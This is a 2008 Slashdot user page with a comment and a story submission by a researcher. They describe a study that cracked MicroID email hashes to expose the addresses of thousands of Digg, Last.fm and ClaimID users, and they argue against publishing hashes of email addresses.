cce - Slashdot User

Comment Re:Flawed study? (Score 1) 155

by cce on Thursday August 28, 2008 @08:26PM (#24787813) Attached to: Hashing Email Addresses For Web Considered Harmful

I address this question in the paper and on the tiny FAQ here. Basically, DHAs require a spammer to interactively query an email server and blindly guess popular names: here, the server can throttle or block access to these requesters, and the success rate is very low.

With MicroID, the tokens are meant for public use, and thus can accessed with a simple HTTP GET. Cracking them yields much higher success rates (25% from Digg) than DHAs, as well as a "verified" user email, & links to that user's associated content (e.g., favorite Last.fm songs for ringtone spam, favorite Digg articles).

Submission + - Hashing email addresses for web considered harmful (brown.edu)

Submitted by cce on Thursday August 28, 2008 @03:15PM

cce writes: The MicroID standard, despite getting thrashed soundly by Ben Laurie two years ago, has since been recommended by the DataPortability Project and published on the user profiles of millions of users at Digg and Last.fm. MicroID is basically a hash calculated using a user's profile page URL and registered email address, producing a token that makes the email address vulnerable to dictionary attacks. To see how easy it was to crack these tokens, I conducted a small study, choosing 56,775 random Digg users, and cracking the email addresses of 14,294 of them (25%) using just their MicroID, username, and a list of popular email domains. Digg has more than 2 million users, and that means half a million of them — mostly people who had never heard of MicroID, and had probably not logged in for a long time — had their email addresses exposed to this trivial attack. I also applied this attack to Last.fm (19%) and ClaimID (34%). Digg and Last.fm have since removed support for MicroID, but the lesson is clear: don't publish a hash of my email address online, guys!

Slashdot Top Deals